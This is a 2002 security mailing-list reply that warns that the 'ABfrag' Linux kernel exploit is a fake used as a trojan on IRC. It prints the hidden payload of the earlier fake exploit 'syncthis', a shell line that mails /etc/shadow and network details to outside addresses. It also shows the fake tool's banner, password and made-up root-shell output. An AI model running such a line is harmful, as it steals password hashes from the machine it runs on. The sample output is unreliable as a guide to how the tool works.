Re: Linux Kernel Exploits / ABFrag

[Muhammad Faisal Rauf Danka <mfrd () attitudex com>]

Read that related news: 
<quote> 
A message posted on the Security Mailing list BugTraq about an exploit for Linux kernels "ABFrags" has turned out to be 
a fake. Rumors about "abfrags.c", that would use a security hole in the TCP/IP stack, have been spreading for week on 
the chat network efnet, although at that time it was supposed to be an a exploit for Free BSD kernels. 
</quote> 

link: http://www.heise.de/english/newsticker/data/jk-18.10.02-006/ 

Previously there have been a binary out by the name "syncthis", which looked somewhat same, but actually use to run 
this behind: 

#!/bin/sh 
(/sbin/ifconfig;cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME b4shb0y () hotmail com -c B1tch () hushmail com 
> /dev/null 2>/dev/null 

It claimed to be a Linux tcp stack exploit. 

McKenzy Wihle GSH security - 9/01/02: 
Remote kernel tcp packet sync bug. Check GSH main dir for whitepaper. 
This bug does not leave GSH labs until further notice. 

update: 
9/03/02 - got response from George Weenste, NSA coordinated fix release 
and vulnerability disclosure to come in December 2002 linux kernel developers warned 

--- WARNING: Will not fail on most errors, read whitepaper for proper use. --- 

READ WHITEPAPER! - no args 


It's password was "nsasucks" 

Has anyone tried that on the abfrag binary? 

ABfrag posers are pasting this on irc sessions to initiate trades, and eventually get access to your host. 

server@thebox:~$ ./ABfrag.bin -d 192.168.1.20 

---------------------------------------------------------------------------- 
ABfrag - Linux Kernel ( <= 2.4.20pre20 ) Remote Syncing Exploit 
Found and coded by Ac1db1tch3z - t3kn10n, n0n3 and t3kn0h03. 
WARNING: 
Unlicensed usage and/or distribution of this program carries heavy fines and penalties under American, British, 
European and International copyright law. 
Should you find this program on any compromised system we 
urge you to delete this binary rather than attempt distribution or analysis. 
Such actions would be both unlawful and unwise. 

---------------------------------------------------------------------------- 
password: 
* Finding local offsets (for sync with remote kernel). 
* Finding remote time intervals...567ms per packet 
* repairing LKM source into shellcode 
* Obtained socket for connect back 
-- Sending Racer PACKET complete! -- 
.............................................CONNECT BACK 
FAILED! 
FIXING! 
Fixed timing at 0x8453fffe 
bash# id 
uid=0(root) gid=0(root) groups=11(httpd) 
bash# w 
6:01pm up 12 days, 17:06, 0 users, load average: 0.34, .26, 
0.20 


I think probably the person who cracked Mr Daniel, might have uploaded this trojan later on to try his box as a launch 
pad to attack more hosts/ to just try out this exploit too for the heck of it. 

Does Mr daniel have any snort dumps, while the attack occurred?


Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202

_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------

_____________________________________________________________
Select your own custom email address for FREE! Get you () yourchoice com w/No Ads, 6MB, POP & more! 
http://www.everyone.net/selectmail?campaign=tag